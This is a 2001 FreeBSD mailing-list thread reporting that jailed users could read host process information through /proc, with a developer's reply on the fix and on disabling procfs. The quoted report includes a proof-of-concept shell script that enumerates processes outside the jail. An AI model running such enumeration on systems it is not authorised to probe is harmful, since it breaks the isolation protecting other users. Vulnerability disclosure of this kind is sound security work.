This is fixed in 5.0-CURRENT, but the architectural improvements to
support the fix have not been merged, since they're still in flux. My
general advice is to not mount procfs on systems with untrusted users.
It's almost possible to not lose functionality in doing that -- I
understand DES has patches to truss to make it use ptrace(), which is the
last remaining instance I can think of.
(actually, I think ps -e requires procfs still)
Robert N M Watson FreeBSD Core Team, TrustedBSD Project
[EMAIL PROTECTED] NAI Labs, Safeport Network Services
On Mon, 29 Oct 2001, opr wrote:
>
> Hello,
>
> i really have no clue if i should mail this to you guys, but we've found some
>issue's in de jail's /proc. We were able to find information about processes running
>outside the jail, or running in other jails.
> eg. when i run sshd in the host system, and it has PID 655, i can login on the jail,
>and by execution "ls -l /proc/665/file" i can see what binary is running on pid 655.
>So any user of the jail system can see what processes you run on that server. I'm
>running FreeBSD 4.4-RELEASE on a i386.
>
> greetz,
>
> Pieter Danhieux
>
> Proof of concept shellscript:
>
> #!/bin/sh
> _COUNT=0;
> while [ $_COUNT -le 65000 ];
> do
> if [ -f /proc/$_COUNT/file ];
> then
> _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`;
> _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`;
> echo "PID= $_TELLER USER= $_USERPROC= $_PROC";
> fi
> _COUNT=`expr $_COUNT + 1`;
> done
>
> -
> [www.bsdaemon.be]
> -
>
>
> To Unsubscribe: send mail to [EMAIL PROTECTED]
> with "unsubscribe freebsd-hackers" in the body of the message
>
To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-hackers" in the body of the message
